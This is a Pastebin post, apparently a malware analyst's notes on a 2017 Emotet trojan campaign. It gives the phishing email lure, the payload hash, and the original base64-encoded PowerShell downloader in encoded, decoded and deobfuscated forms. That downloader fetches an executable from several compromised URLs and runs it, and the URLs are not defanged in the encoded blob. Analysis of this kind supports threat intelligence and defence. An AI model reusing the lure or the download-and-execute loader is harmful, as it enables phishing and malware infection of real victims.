Advertisement
Nestor10

170821 Emotet Trojan

Nov 6th, 2017
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.49 KB | None | 0 0
  1. # Phishing Email
  2.  
  3. Hi [recipient],
  4.  
  5.  
  6. I’ve tried to call you but couldn’t get thought. Need to know the status of this invoice I’ve sent to you a while ago. provided a copy below.
  7.  
  8. http://advancedalternatives[dot]co.th/Invoice-number-154082/
  9.  
  10. Best Regards,
  11. [fake sender name]
  12.  
  13. # Linked Payload
  14.  
  15. Stage 1 payload is a .doc file which executes the powershell below.
  16. SHA256: f13e2c5ae7e3f949a575856fb0b5d285eae746c7b77cf6272a6e11e99fcec9e6
  17.  
  18. Stage 2 payload downloaded from the URLs found in the deobfuscated section below. Haven't analyzed yet.
  19.  
  20. # Original Stage 1 Payload
  21.  
  22. JAB7AFcAYABzAEMAcgBgAEkAUAB0AH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwAnACwAJwB0ACcALAAnAGIAagBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbABsACcALAAnAGUAJwAsACcAVwBTAGMAcgBpAHAAdAAuAFMAJwAsACcAaAAnACkAOwAkAHsAVwBFAGAAQgBgAGMAYABMAEkARQBOAFQAfQAgAD0AIAAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlACcALAAnAGMAdAAnACwAJwBuAGUAdwAtAG8AYgBqACcAKQAgACgAIgB7ADIAfQB7ADUAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADYAfQAiAC0AZgAnAFcAZQBiAEMAbABpACcALAAnAC4AJwAsACcAUwB5AHMAdAAnACwAJwBlACcALAAnAE4AZQB0AC4AJwAsACcAZQBtACcALAAnAG4AdAAnACkAOwAkAHsAUgBBAG4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAHcALQBvACcALAAnAG4AZQAnACwAJwBiAGoAZQBjAHQAJwApACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBtACcALAAnAHIAYQBuAGQAbwAnACkAOwAkAHsAVQByAGAAbABzAH0AIAA9ACAAKAAiAHsAMQA0AH0AewAyADAAfQB7ADEAOQB9AHsAMQAzAH0AewAwAH0AewAxADcAfQB7ADMAfQB7ADIAMwB9AHsANAB9AHsANwB9AHsAMQA4AH0AewA1AH0AewAxADUAfQB7ADIAOQB9AHsAOQB9AHsANgB9AHsAMwAwAH0AewAyAH0AewAyADEAfQB7ADEAMQB9AHsAMQB9AHsAMgA4AH0AewAyADYAfQB7ADEAMgB9AHsAOAB9AHsAMgA3AH0AewAyADQAfQB7ADEANgB9AHsAMgAyAH0AewAxADAAfQB7ADIANQB9ACIAIAAtAGYAJwBxAG4AaAAnACwAJwBJAG4AVgBUAC8ALAAnACwAJwAvAHoAcgAnACwAJwB0ACcALAAnAC8ALwB3ACcALAAnAGkAZwBuAC4AYwBvAG0ALgBhAHUALwAnACwAJwB0AGkAdgBlAGkAdAAnACwAJwBpACcALAAnAHIAdABzACcALAAnAGUAYwAnACwAJwB3AEoAJwAsACcARwAnACwAJwBvACcALAAnAC8AbwBoAGwAZQByAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwAnACwAJwBoACcALAAnAEUAbQBPAFkAegBjAGkAJwAsACcAeQBvAGYAJwAsACcAdgBxAEwAZQBHAGQAcwAvACwAaAAnACwAJwBsAHMAbwBuAGQAZQBzACcALAAnAHAAOgAvACcALAAnAHQAdAAnACwAJwBNACcALAAnAGQAYQBsAGwAYQBzAC4AYwBvAG0ALwBGACcALAAnAHQAcAA6ACcALAAnAG8AbQAuAGIAcgAvAEEARQBWAEgAVgAvACwAaAB0AHQAcAA6AC8ALwBuAHUAYgBvAGQAJwAsACcAUwBnAHYAUABLAEYALwAnACwAJwA6AC8ALwBwACcALAAnAGUAdgBlAG4ALgBjACcALAAnAGgAdAB0AHAAJwAsACcAWABOAC8ALABoAHQAdABwADoALwAvAGUAZgBmACcALAAnAC4AYwBvAG0ALgBhAHUAJwApAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBTAHAAbABpACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBOAGAAQQBNAGUAfQAgAD0AIAAkAHsAUgBgAEEAYABOAGQATwBNAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG4AJwAsACcAZQB4AHQAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGEAYABUAGgAfQAgAD0AIAAkAHsAZQBgAE4AVgA6AGAAVABlAG0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAEEAYABtAGUAfQAgACsAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC4AJwAsACcAZQB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewBVAGAAUgBsAH0AIABpAG4AIAAkAHsAVQByAGAATABzAH0AKQB7AHQAcgB5AHsAJAB7AHcAZQBgAEIAQwBMAGAAaQBgAGUAbgB0AH0ALgAoACIAewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAJwBEACcALAAnAG8AdwBuAGwAJwAsACcAYQBkAEYAaQBsAGUAJwAsACcAbwAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAbgBnACcALAAnAFQAbwBTAHQAcgBpACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYQBgAFQASAB9ACkAOwAmACgAIgB7ADMAfQB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAdAAtAFAAcgAnACwAJwBvAGMAJwAsACcAZQBzAHMAJwAsACcAUwB0AGEAcgAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7ACYAKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIALQBmACcAdwAnACwAJwBoAG8AcwB0ACcALAAnAHIAaQB0ACcALAAnAGUALQAnACkAIAAkAHsAXwB9AC4AIgBFAGAAWABjAGUAcABUAGAAaQBvAG4AIgAuACIATQBFAHMAUwBgAEEAYABHAEUAIgA7AH0AfQANAAoA
  23.  
  24. # Decoded
  25.  
  26. ${W`sCr`IPt} = .("{0}{2}{1}" -f'new-o','t','bjec') -ComObject ("{2}{3}{1}{0}"-f 'll','e','WScript.S','h');
  27. ${WE`B`c`LIENT} = .("{2}{0}{1}" -f 'e','ct','new-obj') ("{2}{5}{1}{4}{0}{3}{6}"-f'WebCli','.','Syst','e','Net.','em','nt');
  28. ${RAn`D`OM} = &("{1}{0}{2}"-f 'w-o','ne','bject') ("{1}{0}" -f'm','rando');
  29. ${Ur`ls} = ("{14}{20}{19}{13}{0}{17}{3}{23}{4}{7}{18}{5}{15}{29}{9}{6}{30}{2}{21}{11}{1}{28}{26}{12}{8}{27}{24}{16}{22}{10}{25}" -f'qnh','InVT/,','/zr','t','//w','ign.com.au/','tiveit','i','rts','ec','wJ','G','o','/ohleronline.com/','h','EmOYzci','yof','vqLeGds/,h','lsondes','p:/','tt','M','dallas.com/F','tp:','om.br/AEVHV/,http://nubod','SgvPKF/','://p','even.c','http','XN/,http://eff','.com.au').("{1}{0}"-f't','Spli').Invoke(',');
  30. ${N`AMe} = ${R`A`NdOM}.("{0}{1}"-f 'n','ext').Invoke(1, 65536);
  31. ${Pa`Th} = ${e`NV:`TemP} + '\' + ${NA`me} + ("{0}{1}" -f'.','exe');
  32. foreach(${U`Rl} in ${Ur`Ls}){try{${we`BCL`i`ent}.("{0}{1}{3}{2}"-f'D','ownl','adFile','o').Invoke(${U`RL}.("{1}{0}" -f 'ng','ToStri').Invoke(), ${Pa`TH});
  33. &("{3}{0}{1}{2}" -f't-Pr','oc','ess','Star') ${p`AtH};
  34. break;
  35. }catch{&("{0}{2}{3}{1}"-f'w','host','rit','e-') ${_}."E`XcepT`ion"."MEsS`A`GE";
  36. }}
  37.  
  38. # Deobfuscated
  39.  
  40. $WScript = New-Object -ComObject WScript.Shell;
  41. $WebClient = New-Object System.Net.WebClient;
  42. $Random = New-Object random;
  43. $Urls = {"http://ohleronline[dot]com/qnhvqLeGds/",
  44. "http://wilsondesign[dot]com.au/EmOYzciXN/",
  45. "http://effectiveit[dot]com.au/zrMGInVT/",
  46. "http://portseven[dot]com.br/AEVHV/",
  47. "http://nubodyofdallas[dot]com/FwJSgvPKF/"
  48. };
  49. $Name = $Random.Next.Invoke(1, 65536);
  50. $Path = $EnvTemp + '\' + $Name + '.exe';
  51.  
  52. foreach($Url in $Urls) {
  53. try {
  54. $WebClient.DownloadFile.Invoke($Url.ToString.Invoke(), $Path);
  55. Start-Process $Path;
  56. Break;
  57. } catch {
  58. Write-Host $Exception.Message;
  59. }
  60. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement